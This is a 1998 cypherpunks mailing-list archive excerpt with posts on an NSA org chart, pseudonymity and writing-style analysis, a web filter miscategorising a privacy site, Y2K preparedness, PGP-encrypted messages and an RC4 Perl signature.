VmNZQW9KWE1WRGVTalA3bwpKNXYzTWI5VE5oTmxmT2ltQUo5UkFqUnVrZlN3
SWpYRUtZdFMwKzYyRE1ieVFMa0NEUVF6bjUrNkVBZ0E5a0pYCnR3aC9DQmR5
b3JyV3FVTHpCZWo1VXhFNVQ3YnhicmxMT0NEYUFhZFdveFRwajBCVjg5QUh4
c3REcVpTdDkweGsKaGtuNERJTzlaZWtYMUtIVFVQajFXVi9jZGxKUFBUMk4y
ODZaNFZlU1djMzl1SzUwVDhYOGRyeUR4VWN3WWM1OAp5V2IvRmZtNy9aRmV4
d0dxMDF1ZWphQ2xjanJVR3ZDL1JnQllLK1gwaVAxWVRrbmJ6U0MwbmVTUkJ6
WnJNMnc0CkRVVWREM3lJc3h4OFd5Mk85dlBKSThCRDhLVmJHSTJPdTFXTXVG
MDQwelQ5ZkJkWFE2TWRHR3plTXlFc3RTci8KUE9HeEtVQVlFWTE4aEtjS2N0
YUd4QU1aeUFjcGVzcVZETm1XbjZ2UUNsQ2JBa2JUQ0QxbXBGMUJuNXg4dlls
TApJaGttdXF1aVhzTlY2VElMT3dBQ0FnZjlIZ0Nuak5rcGJ2N0NnbW8rOVlG
NE82UXFweEZJangyZGNHZVRSS052CjFoYitXUy9HaXc5Q2p0dmZDMDUzZUlj
ZFpiU1hZZ0hLdUJMVWZRU0pzZE1aREF5MUkyRk10M1hobWpxdy9obGIKb3FQ
b2ZEOXhncHFRK29Wak9kNk0xc0traXZvc3ZLc0NpaVJiRFc5RWNkTnkvTHhj
Zmo0aGxIL2thUGI2K21ZNgprdFNLYThKSzdHR2UrN2xDREYxUFZ0eVlGZE55
amI0VFc1R3RLa0ZMN1RXYWVrOGhyWlR3ci9weU9SK2tYeGdJClgvM3pJOWc1
cXpLb2QzOEdlR2VXV3d6V28yS1IySnIxaUp1T3M3amRmSXVHQVROU21pRTJB
NjJRVzZteTVRMTEKTG5wbDd0RCs4MmprZ1RWNjZLZi9Rb3BVeHhSZmZEVW1s
aElPS0RhSGordE4rNGtBUHdNRkdET2ZuN3FKY1orbgp0bU93L1JFQ2Rsc0Fv
T0FhRFNqZFB0ZlNtejA5bFk0YW5LU2Z5SnpaQUtESGlFalNTTG5QZTA1empQ
SHpzWURkCkl2YmU0dz09Cj1ad0U0Ci0tLS0tRU5EIFBHUCBQVUJMSUMgS0VZ
IEJMT0NLLS0tLS0A
--Boundary..3999.1071713822.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 21 Dec 1998 11:18:44 +0800
To: John Young <cypherpunks@EINSTEIN.ssz.com
Subject: Re: NSA Org Chart
In-Reply-To: <199812181558.KAA27257@camel7.mindspring.com>
Message-ID: <19981220215426.A969@weathership.homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



Interestingly, the export control liason is not on the chart.  Perhaps 
this is a result of Whit pointing out in his book* that it was G2033,
an intelligence group.  One of its roles was to collect information to 
help other groups understand the technology they were looking at.

*Privacy on the Line, with Susan Landau, 1998.  If you haven't read
it, do.  I found it quite worthwhile and enjoyable.  Most cypherpunks
will already be familiar with most of whats there, but the footnotes
and asides are wonderful, and its a good compendium and overview.


Adam


On Fri, Dec 18, 1998 at 10:47:05AM -0500, John Young wrote:
| Thanks to Defense Information and Electronics Report
| we offer NSA's organizational chart, which was obtained
| by DI&ER under the FOIA:
| 
|    http://jya.com/nsa-chart.htm

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zooko <zooko@wildgoose.tandu.com>
Date: Mon, 21 Dec 1998 15:14:41 +0800
To: cypherpunks@cyberpass.net
Subject: repost(?): Why i am not truly pseudonymous yet (was: Re: keyword scanning and countering writing style analysis)
Message-ID: <m0zrzGq-00000cC@wildgoose.ml.org>
MIME-Version: 1.0
Content-Type: text/plain




Cypherpunks:


I tried to send this message to the cypherpunks in April 1998. 
I suspect that this, and many other messages that i sent, never
reached the cypherpunks list.


If any of you remember reading this, or have a copy of it in 
your archives, please let me know.


Regards,

Zooko


------- Forwarded Message

Date: Wed, 1 Apr 1998 07:06:44 +0200 (MET DST)
From: Zooko Journeyman <zooko@xs4all.nl>
To: zooko@xs4all.nl
Newsgroups: list.cypherpunks
Subject: Why i am not truly pseudonymous yet (was: Re: keyword scanning and countering writing style analysis)
References: <199803252037.UAA06168@server.eternity.org>

Adam:


I think that the state of the art on this is probably close to
the boundaries of the science of machine learning.


I recently saw a presentation by a researcher from Bell Labs.
His machine learning system, which is being patented, had 
success rates better than competing systems (including better 
than a hand-scripted system!) at identifying into which 
categories a phone call or letter to AT&T fell:  "Billing", 
"Subscription", "Complaint", "Delay", "Installation", etc.


Presumably the NSA has similar systems with all of our favorite
keywords.  (Toto: insert funny jokes here.)


Anyway, if _i_ were forced to bet on it, i would say that such 
systems are not yet good enough to reduce the cost of matching
nyms to "insignificant", but that such systems probably _will_
be that good before too long (and our old articles will still
be useful as data then...).


Now the question about counter-measures, i don't know.  (There
is a trade-off between safety and expressiveness here.  We 
could all buy a copy of AltaVista's translator software and
language databases, and then run our missives through a couple 
of pidgin foreign languages before posting them.  [Toto: insert
funny joke about JYA here.])


<sigh>



I think this issue is growing in importance.  I currently use a
very weak nym, which anyone with a little skill should be able
to crack [Toto: bonus points if you _privately_ send e-mail to
one of my eunymous accounts].  I'm starting to think that this
is the worst of both worlds, as potentially malicious sorts are
not significantly slowed down, while potentially beneficient
people are kept a bit more distant from me and are thus less 
likely to be of use to me.  (e.g., people who know me as Zooko
wouldn't notice if "Anna Rosenbaum" (my real name) were to
disappear one night, and vice versa.)


By the way, the reason for my failure should be instructive:  
my nym is so crackable not because of any technical detail 
having to do with remailers or encryption-- it is that 
i foolishly posted articles containing both nyms in the distant 
past, and those articles are now a permanent part of the The 
Net instead of decaying and disappearing like articles from 
even earlier years did.


Another issue for me is the onerous cost of starting a fresh 
nym.  The benefits (true pseudonymity) are uncertain (the bad 
guys' techniques might crack my best effort using current 
technology (especially because of textual analysis as per the
original topic of this message)), and the costs are that i lose
the advantages of concentration of reputation into a single 
nym.


(I've already observed this, a little, with my current set of
weak nyms.  Adding a strong one would only exaccerbate my 
woes.)


A final problem i have with true pseudonymity is that i _like_
meeting people in Real Life, and not only to fight or fuck 
them.




Okay, this has been long and rambling, but i hope useful to 
some of you.  One more point before i go:


There are two ideas of pseudonymity that i have considered.  In
one, you are truly the only person who knows that the nym maps
to your body.  This has obvious advantages, and obvious 
disadvantages.  In the other (which is basically what "Zooko" 
is and was intended to be), there is a large, ill-defined group
of people who also know of the mapping.  This has its 
advantages too-- social advantages (which are very important!),
but the disadvantage is that it is trivially cracked by a mole.



[In fact, i think i recall that about the time "Zooko" appeared
on the scene one "Adam Back" sent me e-mail saying, "Hey--  you
write a lot like Anna Rosenbaum did...  Are you her?".]



[So if anyone wants to do me a favor, look about in your 
archives and dissociate "Zooko" with "Anna".  Thanks!  It might
actually do me some good in the long run, although not, of 
course, against the likes of the NSA.  Perhaps against others.]


Regards,

Zooko

P.S.  For an Nth reason that i don't have a strong pseudonym, 
i never bothered to learn how to use a remailer front-end.  Now
with Xemacs 20 and Mozilla out, i could probably handle it...

P.P.S.  Today i found the 3rd person, including myself, who 
has used the name "Zooko" on the net.

        .----,     |                     mailto:zooko@xs4all.nl
          . /      |    http://www.xs4all.nl/~zooko/public.html
         . /       |   "Any technology which is distinguishable 
        +____.     |    from magic is insufficiently advanced."

------- End of Forwarded Message




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 21 Dec 1998 08:28:17 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: No Subject
Message-ID: <199812210000.BAA07957@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Prepping for Y2K armageddon so far has caused our taskforce 
little more trouble than post-its on each device showing an 
ode to Mercury for getting the lead out in time to lope upstairs 
shedding clothes for the bacchanale planned to celebrate the 
end of computer oversight of our infrapasture.

We urge ourselves: good riddance to everything overmanaged 
by the matrixed interdependent skeins of networks and switches 
and redundancies and dev nulls and robot backups, time to get 
back in touch with fecund reality, slurp gutters, chew roots, 
sniff musks, chuck pixels.

One mole aint into that, though, and uplinks us it's going
to be evil incarnate under sky, without electromechanical life 
and love and think support systems, untethered, fending for 
ourselves, trying to walk and talk, itching filth, urging
senses to pinpoint food and drink, getting no feedback, 
becoming terrified, running across a roadkilled computer, 
gathering around, toggling inputs, rooting peripherals, suckling 
outputs, so the saint preaches, you'll be gasping: why have 
you abandoned us, oh motherboard, boot up.

Hooting, itching to get offline topside we backslash: Rev gospel, 
dirtworm.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 21 Dec 1998 09:06:01 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: FW: PRIVACY Forum Digest V07 #21(excerpt)
Message-ID: <199812210032.BAA10005@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Snip from the latest Privacy Forum Digest on commercial filtering software
for enterprises, encryption and "criminal skills".

cheers,
C.G.

--
A Navigo Farmer

> -----Original Message-----
> From:	privacy@vortex.com [SMTP:privacy@vortex.com]
> Sent:	Sunday, December 20, 1998 4:58 PM
> To:	PRIVACY-Forum-List@vortex.com
> Subject:	PRIVACY Forum Digest V07 #21
> 
> PRIVACY Forum Digest      Sunday, 20 December 1998      Volume 07 : Issue
> 21
> 
[...]
>  
> Date:    Wed, 16 Dec 98 12:25 PST
> From:    lauren@vortex.com (Lauren Weinstein; PRIVACY Forum Moderator)
> Subject: Privacy Discussions Classified as a "Criminal Skill"
> 
> Greetings.  Is discussing privacy in the PRIVACY Forum a criminal skill?
> According to one widely used commercial web filtering tool, the answer was
> yes!  The controversy over software to block access to particular sites,
> based on perceived content, has been continuing to rage.  Attempts to
> mandate the use of such software in environments such as libraries and
> schools have raised a variety of serious concerns.  In addition to fairly
> straightforward freedom of speech issues, another factor revolves around
> how accurate (or inaccurate) these filtering systems really are.  
> 
> I've now seen firsthand that errors by a filtering system can indeed be
> quite
> serious, an event that seems to certainly validate some of these concerns.
> But there is something of a silver lining to the story, as we'll see
> later.
> 
> I recently was contacted by someone at a large corporation, who was trying
> to reach the PRIVACY Forum web site, which is constantly being referenced
> by
> individuals and commercial, educational, government, and other sites
> around
> the world.  This person was upset since whenever they attempted to reach
> the http://www.vortex.com site and domain that hosts the PRIVACY Forum,
> their web software blocked them, informing them that the block was in
> place
> due to the site being categorized as containing "criminal skills."  
> 
> As the webmaster for the vortex.com domain, this certainly came as news to
> me.  The message they received didn't give additional information--they
> didn't even know exactly where it came from.  It was apparent though, that
> the entire organization was probably blocked from reaching the PRIVACY
> Forum, since the filtering software in question was affecting a main
> firewall system.
> 
> After a number of phone calls and discussions with the system
> administrator
> for that organization, the details began to emerge.  The company was
> running
> a filtering software package from Secure Computing Corporation of San
> Jose,
> California.  This package received weekly updates of blocked sites in a
> wide
> variety of categories, one of which was "criminal skills."  
> 
> The administrator had no idea what rationale was used for these decisions,
> they just pulled in the list each week and applied it.  He immediately
> placed
> vortex.com on a local exception list so that it would no longer be blocked
> to
> their users.
> 
> I then turned my attention to Secure Computing.  After a number of calls,
> I
> found myself speaking with Ken Montgomery, director of corporate
> communications for that firm.  He confirmed the information I had already
> received.  The filtering product in question ("SmartFilter") was
> apparently
> not being marketed to individuals, rather, it was sold to institutions,
> corporations, etc. to enforce filtering policies across entire entities.
> The product covers a wide range of information categories that users of
> the
> software can choose to block.  He said that the majority of blocked sites
> were in categories involving pornography, where there was (in his opinion)
> no question of their not belonging there.  
> 
> The "criminal skills" category reportedly was broadly defined to cover
> information that might be "of use" to criminals (e.g. how to build bombs).
> He had no explanation as to why my domain had been placed in that list,
> since by no stretch could any materials that are or have ever been
> there fall into such a categorization.  He did discover that the
> classification of my domain had occurred over a year ago (meaning
> other sites could have been receiving similar blocking messages for
> that period of time when trying to access the PRIVACY Forum) and
> that the parties who had made the original classification were no longer
> with their firm--so there was no way to ask them for their rationale.
> (All of their classifications are apparently made by people, not
> by an automated system.)
> 
> However, it seems likely that the mere mentioning of encryption may have
> been enough to trigger the classification.  The administrator at the
> organization that had originally contacted me about the blocked access,
> told
> me that the main reason they included the "criminal skills" category in
> their site blocking list was to try prevent their users from downloading
> "unapproved" encryption software.  This was a type of information that he
> believed to be included under the Secure Computing "criminal skills"
> category (the "logic" being, obviously, that since criminals can use
> encryption to further their efforts, encryption is a criminal skill).  He
> also admitted that he knew that their users could still easily obtain
> whatever encryption software they wanted anyway, but he had to enforce the
> company policy to include that category in their blocking list.
> 
> As PRIVACY Forum readers may know, no encryption software is or ever has
> been distributed from here.  The topic of encryption issues does certainly
> come up from time to time, as would be expected.  For the mere *mention*
> of
> encryption in a discussion forum to trigger such a negative categorization
> would seem to suggest the fallacy of blindly trusting such classification
> efforts.
> 
> Mr. Montgomery of Secure Computing initially suggested that it was up to
> their customers to decide which categories they wanted to use in their own
> blocking lists--he also stated that as a company they were opposed to
> mandatory filtering regulations.  I suggested that such determinations by
> their customers were meaningless if the quality of the entries in those
> categories could not be trusted and if errors of this severity could so
> easily be made.  I felt that this was particularly true of a category with
> an obviously derogatory nature such as "criminal skills"--the
> ramifications
> of being incorrectly placed into such a category, and then to not even
> *know* about it for an extended period of time, could be extreme and very
> serious.
> 
> To their credit, my argument apparently triggered a serious discussion
> within Secure Computing about these issues.  I had numerous subsequent
> e-mail and some additional phone contacts with Mr. Montgomery and others
> in their firm concerning these matters.  First off, they apologized
> for the miscategorization of vortex.com, and removed it from the
> "criminal skills" category (it was apparently never listed in any
> other of their categories).  
> 
> Secondly, they have agreed with my concerns about the dangers of such
> miscategorizations occurring without any mechanism being present for sites
> to learn of such problems or having a way to deal with them.  So, they
> will
> shortly be announcing a web-based method for sites to interrogate the
> Secure
> Computing database to determine which categories (if any) they've been
> listed under, and will provide a means for sites to complain if they feel
> that they have been misclassified.  They've also suggested that their hope
> is to provide a rapid turnaround on consideration of such complaints.
> 
> While by no means perfect, this is a step forward.  I would prefer a more
> active notification system, where sites would be notified directly when
> categorizations are made.  This would avoid their having to 
> check to see whether or not they've been listed, and needing to keep
> checking back to watch for any changes or new categorizations.  If more
> filtering software companies adopt the Secure Computing approach, there
> would be a lot of checking for sites to do if they wanted to stay on
> top of these matters.  Secure Computing feels that such notifications are
> not practical at this time.  However, their move to provide some
> accountability to their filtering classifications is certainly preferable
> to
> the filtering systems which continue to provide no such facilities and
> operate in a completely closed environment.
> 
> So, we make a little progress.  The PRIVACY Forum and vortex.com are no
> longer miscategorized and have been removed from all Secure Computing
> block
> lists.  Secure Computing was polite and responsive in their
> communications with me, and will establish the system discussed above in
> reaction to my concerns.  Web filtering of course remains a highly
> controversial topic with many serious negative aspects, but we see that
> when
> it comes to dealing with the complex issues involved, it would be a
> mistake
> to assume that all such filters all created equal.
> 
> --Lauren--
> Lauren Weinstein
> Moderator, PRIVACY Forum
> http://www.vortex.com
> 
[...]
>  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 21 Dec 1998 13:59:43 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: qXt8in0ocFjj3wHmDXe6PVJil1/NP0rd
Message-ID: <199812210539.GAA32042@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP MESSAGE-----
Version: PGPfreeware 5.0i for non-commercial use
MessageID: qXt8in0ocFjj3wHmDXe6PVJil1/NP0rd

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
TV9Ai5z2v6tLs9frNg==
=t4nq
-----END PGP MESSAGE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DOOM Anonymous Untraceable User <nobody@seclab.com>
Date: Mon, 21 Dec 1998 14:04:45 +0800
To: cypherpunks@cyberpass.net
Subject: SURVEY SHOWS COUNTIES ARE BEHIND ON Y2K FIX
Message-ID: <199812210540.GAA29458@rogue.seclab.com>
MIME-Version: 1.0
Content-Type: text/plain



A survey by the National Association of Counties shows that one-third of
the nation's counties aren't even aware of the Y2K problem -- and about 75% of
the 119 counties with populations below 10,000 haven't developed a plan for
updating their computer systems to deal with the millennial data change.
Total Y2K spending among counties is expected to reach $1.7 billion,
according to the association.  (Information Week 14 Dec 98)

#!/usr/local/bin/perl -0777-- -export-a-crypto-system-sig -RC4-3-lines-PERL
@k=unpack('C*',pack('H*',shift));for(@t=@s=0..255){$y=($k[$_%@k]+$s[$x=$_
]+$y)%256;&S}$x=$y=0;for(unpack('C*',<>)){$x++;$y=($s[$x%=256]+$y)%256;
&S;print pack(C,$_^=$s[($s[$x]+$s[$y])%256])}sub S{@s[$x,$y]=@s[$y,$x]}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 21 Dec 1998 23:46:41 +0800
To: "Lucky Green" <cypherpunks@Algebra.COM>
Subject: Re: New PGP key for Lucky Green
In-Reply-To: <000301be2c8d$06c77b60$3501a8c0@lucky.zks.net>
Message-ID: <v04020a0bb2a3ec222626@[139.167.130.249]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:53 PM -0500 on 12/20/98, Lucky Green wrote:


> Please
> discontinue use of my old DSS key.

Why didn't you just send out a revocation along with your key, then?

Cheers,
RAH
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "D.STARR" <d-starr@usa.net>
Date: Mon, 21 Dec 1998 23:50:09 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <19981221145103.28186.qmail@www0t.netaddress.usa.net>
MIME-Version: 1.0
Content-Type: text/plain



sounds to me like they want to create chaos where none exists or is likely to
exist!

"Defence officials called for "aggressive and preventive actions" now to
reduce the Year 2000 risk to a more manageable level.  The military will have
about 32,000 of its personnel dedicated to Operation Abacus, with thousands
more available if needed."

  darkstarr
    
  cypherpunks-errors@toad.com wrote:
  > LOCAL 

  >  Saturday 12 December 1998 

  > 

  > 'Martial law' rushed for Y2K chaos Report warns government to be ready to 

  > invoke federal Emergencies Act

  > 

  >  By David Pugliese           The Ottawa Citizen

  <snipped>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

"The human animal needs a freedom seldom mentioned; 
freedom from intrusion. He needs a little privacy."
                                 --Phyllis McGinley
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNXlDlmzbxbzh8ktOEQIS9wCfX0vXT5Txyn7LTiiTHSbEw+fBOycAnA6C
fc2bGY8gGslVN/Kn4M7rPx13
=BKC6
-----END PGP SIGNATURE-----




____________________________________________________________________
Get free e-mail and a permanent address at http://www.netaddress.com/?N=1




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 21 Dec 1998 17:29:43 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: I76wQeB9zDPUp2NfsZqfInyfQ1A4ojlu
Message-ID: <199812210854.JAA11012@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP MESSAGE-----
Version: PGPfreeware 5.0i for non-commercial use
MessageID: I76wQeB9zDPUp2NfsZqfInyfQ1A4ojlu

qANQR1DBw04DqBWstt3od4kQEADSNbitGXgmnIRHKrxxopORx/43C8dmUcH50uTJ
f/CnZ4SLqVi6tu8qqFG3dFnrlsMUHvoNEIzu+yJrAbexuEtCfY5D+YOVioEPMBZw
zrUin/A6wjz1TBJ1HOOX58+5WMXswFOcJccbUAj63qnTP9OWLpSUdE+xNBbMykHy
qvOwxMmMmVbttv5pYEoKf2WbqxpL0/U3lRGfbuKsy5k8EHPhoiMcoaL0dMUh3PYn
ewOBTdDr4+s0PcqQe4JV34H49jzB6pht8X+UEJSi9Yw4Xdx4sWl/cIf+n8hI/FxO
sSFd1r+ym5zJbF4HYUKygFRvU5/kfVaDTUR6A+ATu3CnncmQmP2G5UJ4T2SGHUKg
hY+mJG5WosK4vu/c8rv9J1FjbsLc1eChWYOlPetF0d5JgD/cvjcmvAbB2W32ZcLk
xilFNUrHWHW+7qio1CC2+dNPjRC+tZ81gCRP0x9QqQlzWbLbGDW0iAh0WF73qqI5
Q8oVCzDWT6rL44X4HKtIYnFQUWAhlpe1TG8T+izkjb/9vMGB0VJvLrq7iZBtlsdo
AhaU0KQzH6rWTQI0sawL6H9tM85OaJt5dIDiaD6RcXxyGcp+A5a0GsBVqf90hxrZ
WYe7Op0DpyHZ/wda+LfvnKpt/8Dbg8nQLSLMH5veT7yPwq5ztB2/8xwWubYXr3KS
fKIBSRAAs0xY89bSzGWHnfBpK0MhLULpERQuRkXLyOmQZYc7ufKuu3VzAtqwutEe
k+w7yiqpl1xjLR67MiesTvbcrtDlMpHSQHUCemRgo7zObovXu32MJTwiZAcZtBcM
q38TEl5C6TfA9+ZYP/fo7Z8i4uMMcv5VGj7MrlEnijFiCKqc2lC1gTQkkfJ64aTe
ENRCl1adCb1FOPF84aXxTB4SDKPpx4PcC0f+HIIXbxmiCUBRy3LSyqGwgfRDM2b7
digR+46xkLaKLhTsAyNM47bknwC376bu2M+s35XM+g4F4kKrTJBpqGYI4dRXNdlk
kMcn6x0JLW4/bhAqjYWTZMkyozymihapbss0pf47qg9Fn3riXUckgVPuzli7+uQ7
L6WPPaHS3iJS3a9UjvDcL8CoQgIb4IF43WSgaITotCASItYYNrPELgWnau6AyN3A
nSOUTty0u1n1RHfrem9UzNgfdPnTo7+R7woFn/nunimbXCYV/GG6QvnN7ZTNiJyW
DPgTn4ymElzde+jIrwY73kviHdEb4wt4vozTCnYtACiDUKk84N62sbrbX5MQH44K
lzNTsyYW10gAsAGSjSjeI8/NUJyWU9VvVPuurbYoIm4dKEomnTl8nRBKB6tmVB8K
LqWJdxOHi10nRPfQa/Us+mGZAQx4QsrUWqjRRjkWEbv1gCA3AJXJwRjyT7nlUNqi
WebMc9Fstlcj94Y/y4SA7pDoOr3WxUtKQ/oXUVuUStxXsmnfJL+Wv9E7yFgloTO/
jM/Zj6okXavZuYwxAvl1yX9ND1SvPN67ktnL2JqhZQKo1WKUkTo+VpVHlFb0uBU7
CN9nF4dSwhG4IdOxcj5+LSSoSIJtHxX2OQ//DFfutIFra0ZsJBMgXt418B8RbzfR
8KdxFALNhCJyFpTTQXfx0X2mIBK8Sf8o2aezhHYxme+iemk5wvxLQEuR31KaOJHN
Kt2uhFRa3j1YOYFrGC6PiHXgWjFWHe687G6AxJUHkoi+r7w7nVnuyyq3XQjaw7Ho
cjWEX2FKH2hgylvRKYz54K3GFKzIKFWLkNdknI/ckJTRrXNQfAnd3XLfxmQbsfN7
Q2PRJyAczRLBpwNZJXs5xwam3hFfParBbdb/Bk1BzcXQ6JCN0jr7N8VG+hZeNdGm
TS2V62R3CIjalkO0YjxDA6jgcsri3TPcfjTJfka/FD+txcu/f38xwjFxxa2UziOD
